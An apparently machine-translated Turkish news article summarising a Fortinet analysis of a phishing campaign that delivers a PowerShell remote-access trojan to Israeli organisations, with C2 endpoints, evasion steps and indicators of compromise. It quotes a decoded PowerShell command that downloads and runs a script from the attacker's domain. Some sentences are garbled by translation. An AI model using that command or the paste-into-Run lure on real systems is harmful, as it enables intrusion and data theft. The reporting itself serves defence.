Tehdit aktörleri, Fortinet’in Fortiguard laboratuvarları tarafından keşfedilen sofistike bir siber saldırıda İsrail altyapısına ve kurumsal kuruluşlara karşı coğrafi olarak odaklanmış bir kampanya başlattı.
Yalnızca PowerShell komut dosyaları aracılığıyla Windows sistemleri aracılığıyla teslim edilen saldırı zinciri, uzaktan erişimi, verileri kolaylaştıran, kalıcı gözetim ve uzlaşmış ağlardaki yanal hareket sağlar.
Yüksek ciddiyet olarak sınıflandırılan bu operasyon, savaş zamanı tıbbi tedarik yönetiminde mentorluk oturumları için davet olarak gizlenen kimlik avı e -postalarından yararlanır, yemleri yaymak ve enfeksiyon oranlarını artırmak için uzlaşmış dahili e -posta sistemlerinden yararlanır.
Tam saldırı akışı, çok aşamalı güç tabanlı bir dağıtım mekanizmasına dayanır, dış yürütülebilir dosyaları geleneksel antivirüs tespitinden kaçınmak için önlemek, PharmacyNod gibi aktör kontrollü alanlardan alınmış yükler ile[.]com.
Kimlik avı kampanyası İsrail sektörlerine çarpıyor
İlk erişim vektörü, alıcıları gömülü bağlantıları tıklamaya çağıran ve bunları sahte bir Microsoft Teams arayüzüne yönlendirmeye çağıran kimlik avı e -postaları ile başlar.
Bu sahte sayfa, kullanıcılara RUN iletişim kutusunu açmak için Windows + R’ye basmalarını, pano kaplı bir dizeyi yapıştırmasını ve kötü niyetli bir PowerShell komutunun başlatılmasını etkili bir şekilde maskeleyen bir sosyal mühendislik taktiği kullanır.
Sitenin HTML’sine gömülü, kod çözüldüğünde “PowerShell IEX ((Invoke-RestMethod -uri HXXPS: // Pharmacynod[.]com/fix -Method get) .Note.body), ”saldırganın sunucusundan ikincil bir komut dosyasını alır ve çalıştıran.
Bu yükleyici, “Kendrick” gibi sınırlayıcılarla ayrılmış ikili kodlu bloblar içeren kurbanın genel indirme klasörüne test.html gibi dosyaları indirir.
Bir takip PowerShell komut dosyası, bu lekeleri bölünerek, ikili ASCII karakterlerine dönüştürerek ve bunları yürütülebilir koda yeniden monte ederek işler ve sonuçta tamamen Powershell’e bir uzaktan erişim Truva atı (sıçan) kullanır.
Gizli yükler
Daha derin analizler, sıçanın yükleyici davranışının, bellek içi yürütme için özel işlevler yoluyla dekompize edilmiş sıkıştırılmış Base64 dizeleri de dahil olmak üzere gizlenmiş içeriğin indirilmesini içerdiğini ortaya koyuyor.
Örneğin, komut dosyaları test.html’den belirli satırları okur, etiketli dizeler çıkarır, sınırlayıcılar üzerine bölünür, ikiliden karakter dönüşümleri gerçekleştirir (örn. “1100110” ikili ondalık 102 eşittir, “F” karakterine eşleme) ve sonuçta ortaya çıkan kodu IEX ile çağırır.
Bu zincir, komuta ve kontrol (C2) sunucusunu pharchacynod’a sert kodlayan kalıcı bir sıçanla doruğa ulaşır.[.]com, tüm iletişim için https kullanma.
Enfeksiyon üzerine, bir “init” işlevi, Windows etki alanı, bilgisayar adı ve kullanıcı adı gibi kurban detaylarını toplar, GZIP ve Base64 ile iki kez sıkıştırır ve tersine çevirir, ardından /16625 uç noktası üzerinden kaydeder.
Sıçan, komutları alma isteğinden önce rastgele aralıklarla (2-7 saniye) uyuyan sonsuz bir yoklama döngüsü ile kalıcılığı korur.
C2’den gelen yanıtlar, yeniden düzenleme için 7979 gibi kodlarla sıkıştırılır, tersine çevrilir ve ön eklenir, System.net.webclient, 4622 üzerinden yük indirmeleri için 5322, anket aralıklarını ayarlamak için 4622 veya /17361’e çıktı ile keyfi Powershell yürütme için 2474.
Kaçma teknikleri, katmanlı gizleme çift GZIP, Base64 kodlama, dize tersine çevirme ve URL-güvenli replasmanları, yerel .NET HTTP talepleri ile birlikte, urlmon.dll aracılığıyla ayarlanan varsayılan kimlik bilgileri, proxy ve kullanıcı agents yoluyla meşru trafiği taklit eden istekleri içerir.
Atıf, bölgesel hedefleme, tehlikeye atılan ortamlardan yanal genişleme ve komut dosyası taktikleri nedeniyle bilinen bir tehdit grubu olan Muddywater ile potansiyel örtüşmelere işaret ediyor.
Bununla birlikte, uzaktan yönetim araçlarından ve genel dosya ana bilgisayarlarından kaçınmak gibi sapmalar ve yeni All-Powershell Rat, başka bir aktör tarafından olası evrimi veya taklit önermektedir.
Bu kampanya, PowerShell/Agent.ph! TR gibi antivirüs imzaları, FortiEDR aracılığıyla uç nokta tespiti ve bu tür tehditleri azaltmak için IPS ve DNS filtrelemesini engelleyen Fortinet korumalarıyla, karaya oturma saldırıları risklerinin altını çiziyor.
Uzlaşma göstergeleri
| IOC | Tanım |
|---|---|
| hxxps: // pharmacynod[.]com/ | Sabit kodlu C2 |
| hxxps: // pharmacynod[.]com/16625 | Kurban Kaydı / Check-In |
| hxxps: // pharmacynod[.]com/17361 | Sunmuş komut sonuçları |
| 46a76b3c7851f30d68bc6a5584bc099435b0544d8707ff7a9178f46046708b | Powershell Rat’ın SHA256’sı |
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!